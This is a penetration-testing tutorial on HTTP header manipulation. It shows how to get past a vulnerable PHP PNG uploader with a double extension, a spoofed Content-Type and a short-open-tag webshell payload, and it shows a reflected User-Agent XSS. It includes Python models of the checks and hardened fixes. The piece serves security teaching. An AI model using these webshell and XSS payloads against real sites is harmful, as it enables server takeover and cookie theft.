
Pwning Through HTTP Header Manipulation Scenarios – Part 1

After some domain changes and the transfer to the PentesterLab blog:

Editing and manipulating HTTP header values during a penetration test often gives us quick access, and the same tricks apply across very different platforms. In this article we look at some scenarios built on header-based attacks.

– Uploader Limitation Evasion

Uploaders are a milestone for attackers: they are where malicious content gets tested and where access is often gained with well-known tricks. In this section we review some code and introduce bypass techniques.

First of all, an uploader that accepts only PNG files and has a protection against PHP files:

<?php
//PentesterLab.ir
// Vulnerable upload handler: every check below relies on client-controlled data.
if (isset($_FILES["file"]))
    if ($_FILES["file"]["error"] <= 0)
        // "type" is copied from the Content-Type header of the multipart part, i.e. from the client
        if ($_FILES["file"]["type"] == "image/png")
            // only requires ".png" to appear somewhere after the first character of the name
            if (strpos($_FILES["file"]["name"], ".png") > 0)
                // fgets() reads only the first line (at most 4095 bytes) and looks for "php";
                // strpos() returns false when the string is absent, and false <= 0 is true
                if (strpos(fgets(fopen($_FILES["file"]["tmp_name"], "r"), 4096), "php") <= 0) {
                    // stored in the web root under the original, client-supplied name
                    move_uploaded_file($_FILES["file"]["tmp_name"], "./" . $_FILES["file"]["name"]);
                    echo "<img src=\"./". $_FILES["file"]["name"] . "\" />";
                }
                else
                    echo "Hacking Attempt!";
            else
                echo "Only files with PNG Type";
        else
            echo "Only files with PNG Type";
    else
        echo "Error!";
?>

Apparently everything works as intended: uploaded files are limited to PNG, which must carry the "image/png" media type. Our goal is to upload a script and get access by editing a few values in the HTTP request headers.

First, change the file name. The check only asks that ".png" appear somewhere after the first character, so a name such as "pwn.php.png" passes it.

This relies on the web server still handing such a file to the PHP interpreter because ".php" appears among its extensions (as an Apache AddHandler-style configuration for .php does): the PHP check sees ".png", but the web server treats the file as ".php".

Second, the media type must be changed. $_FILES["file"]["type"] is copied straight from the Content-Type header of the multipart part, which the client controls, so we set it to "image/png" in the request.

[screenshot: step 1]

[screenshot: step 2]

With those two changes we get past the file type and file name checks, but the upload is still detected as PHP and the server answers "Hacking Attempt!". Why?

Because of the opening tag, the signature of PHP files: "<?php". The first line of the file is scanned for the string "php", so we switch to the short open tag, "<? ... ?>", which contains no "php". Two caveats: the short tag only works when short_open_tag is enabled on the target, and since the check reads only the first line, a payload that starts after a line break is never scanned at all.

[screenshot: step 3]

Our malicious script is uploaded successfully.
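To make the bypass concrete, here is an added example (it is not code from the PentesterLab post) that re-implements the four checks of the PHP uploader in Python and runs the payloads against them offline, next to a hardened variant. The `server_runs_as_php` function is an assumption modelling an Apache AddHandler-style server that executes any file with ".php" among its extensions, the field name "file", the boundary string and the payloads are constructed, and the hardened check is a suggestion of this example, not the post's own fix.

```python
"""Model of the uploader checks from the post, plus an added hardened variant.

Assumptions: short_open_tag is enabled on the target, the web server runs any
file that has ".php" among its extensions (Apache AddHandler style), and the
multipart field is named "file".
"""
import io
import re
import secrets

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"   # 8-byte PNG file signature


def php_strpos(haystack: bytes, needle: bytes):
    """PHP strpos(): byte offset of the first match, or False when absent.
    Python's bool is an int, so the PHP comparisons below behave identically."""
    idx = haystack.find(needle)
    return False if idx < 0 else idx


def vulnerable_accepts(filename: str, content_type: str, body: bytes) -> bool:
    """The checks of the post's PHP uploader, in the same order."""
    # $_FILES["file"]["type"] == "image/png": copied from the client's part header
    if content_type != "image/png":
        return False
    # strpos($name, ".png") > 0: ".png" anywhere after the first character
    if not php_strpos(filename.encode(), b".png") > 0:
        return False
    # fgets(fopen($tmp, "r"), 4096): only the first line, at most 4095 bytes
    first_line = io.BytesIO(body).readline(4095)
    # strpos($line, "php") <= 0: true when absent (false) or at offset 0
    return php_strpos(first_line, b"php") <= 0


def server_runs_as_php(filename: str) -> bool:
    """Assumed server behaviour: any ".php" extension segment, not just the
    last one, hands the file to the PHP interpreter."""
    return re.search(r"\.php(\.|$)", filename, re.IGNORECASE) is not None


def build_multipart(filename: str, content_type: str, body: bytes,
                    boundary: str = "----pwnboundary") -> bytes:
    """multipart/form-data body for the "file" field. The part's Content-Type
    line is exactly what PHP exposes as $_FILES["file"]["type"]."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    return head + body + f"\r\n--{boundary}--\r\n".encode()


def hardened_accepts(filename: str, body: bytes):
    """Added hardened variant: trust neither the client's type nor its name.
    Returns a random storage name, or None to reject the upload."""
    if not filename.lower().endswith(".png"):    # last extension only
        return None
    if not body.startswith(PNG_MAGIC):           # check the bytes, not the header
        return None
    return secrets.token_hex(16) + ".png"        # never reuse the client's name


# Constructed payloads; "real_png" is just a PNG signature, not a valid image.
PAYLOADS = {
    "long_tag":      b"<?php system($_GET['c']); ?>",
    "short_tag":     b"<? system($_GET['c']); ?>",
    "newline_first": b"\n<?php system($_GET['c']); ?>",
    "real_png":      PNG_MAGIC + b"\x00" * 16,
}


def run_bypasses(filename: str = "pwn.php.png") -> dict:
    """Each payload with the manipulated Content-Type: image/png against the
    vulnerable checks (and whether the server would then execute it) and
    against the hardened variant."""
    results = {}
    for name, body in PAYLOADS.items():
        accepted = vulnerable_accepts(filename, "image/png", body)
        results[name] = {
            "vulnerable": accepted,
            "executes": accepted and server_runs_as_php(filename),
            "hardened": hardened_accepts(filename, body) is not None,
        }
    return results


if __name__ == "__main__":
    for name, result in run_bypasses().items():
        print(f"{name:14s} {result}")
```

Running it shows the three lines of the argument above: the long tag is caught because "php" sits at offset 2 of the first line, the short tag and the newline-first payload both pass every check, and the hardened variant rejects everything that is not a real PNG regardless of the name or the declared type.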

– User-Agent Return Value Manipulation

Have you ever seen a website show you your operating system, browser name and so on?

That information comes from the User-Agent header value, and it can be changed as easily as lighting a "Bahman" cigarette :)

Some programmers echo this information back without any filtering, or with incomplete protection, like ThisSite, which only filtered "<script>" in the submitted Referer value (some small blacklist against XSS may have been added). Some even pass the returned values to eval() for certain features, which, depending on the attacker's situation, lets them run their payload.

A very simple example:

 

<?php
	// Reflects the raw User-Agent header into the page with no output encoding,
	// so any HTML or JavaScript the client puts in the header is rendered as markup.
	$agent = $_SERVER['HTTP_USER_AGENT'];
	echo $agent;
?>

[screenshot: malicious value injection]
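As an added example (not code from the PentesterLab post or from the site it mentions), the following Python models the three situations discussed above: the raw reflection of `$_SERVER['HTTP_USER_AGENT']`, a blacklist that only strips "<script>" tags, and the proper fix, output encoding for the HTML context. The blacklist is a guess at what such a filter looks like, not any real site's code; the host name, path and payloads are constructed.

```python
"""Reflected User-Agent: raw echo, a "<script>"-only blacklist, and encoding.

The blacklist is a modelled filter (assumption), not the code of any real site.
"""
import html
import re

# Constructed payloads: one that needs a <script> tag, one that does not.
SCRIPT_PAYLOAD = "<script>alert(1)</script>"
EVENT_PAYLOAD = '<img src=x onerror="alert(document.cookie)">'


def craft_request(user_agent: str, host: str = "target.example",
                  path: str = "/ua.php") -> bytes:
    """Raw HTTP/1.1 request carrying an attacker-chosen User-Agent. A header
    value may not contain CR or LF, so refuse them rather than split headers."""
    if "\r" in user_agent or "\n" in user_agent:
        raise ValueError("CR/LF not allowed in a header value")
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {user_agent}\r\n"
        f"Connection: close\r\n\r\n"
    ).encode()


def reflect_raw(user_agent: str) -> str:
    """Mirrors `echo $_SERVER['HTTP_USER_AGENT'];`: the value lands in the
    HTML body unchanged, so any markup in it is rendered by the browser."""
    return f"<p>Your browser: {user_agent}</p>"


def reflect_blacklist(user_agent: str) -> str:
    """Modelled filter that only removes <script> and </script> tags.
    Event-handler payloads on other tags pass straight through."""
    cleaned = re.sub(r"</?script[^>]*>", "", user_agent, flags=re.IGNORECASE)
    return f"<p>Your browser: {cleaned}</p>"


def reflect_encoded(user_agent: str) -> str:
    """The fix: encode for the HTML output context, the equivalent of
    htmlspecialchars($agent, ENT_QUOTES, 'UTF-8') in PHP."""
    return f"<p>Your browser: {html.escape(user_agent, quote=True)}</p>"


def renders_markup(page: str) -> bool:
    """Crude detector used by this example: is an injected tag still present?"""
    return re.search(r"<(script|img|svg|iframe)\b", page, re.IGNORECASE) is not None


def compare(user_agent: str) -> dict:
    """Whether each variant still emits attacker markup for one payload."""
    return {
        "raw": renders_markup(reflect_raw(user_agent)),
        "blacklist": renders_markup(reflect_blacklist(user_agent)),
        "encoded": renders_markup(reflect_encoded(user_agent)),
    }


if __name__ == "__main__":
    print(craft_request(EVENT_PAYLOAD).decode())
    for payload in (SCRIPT_PAYLOAD, EVENT_PAYLOAD):
        print(payload, compare(payload))
```

The point of the comparison is that the "<script>" blacklist stops the first payload and does nothing against the second, while encoding the value for its output context neutralises both without trying to guess what an attacker might send.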

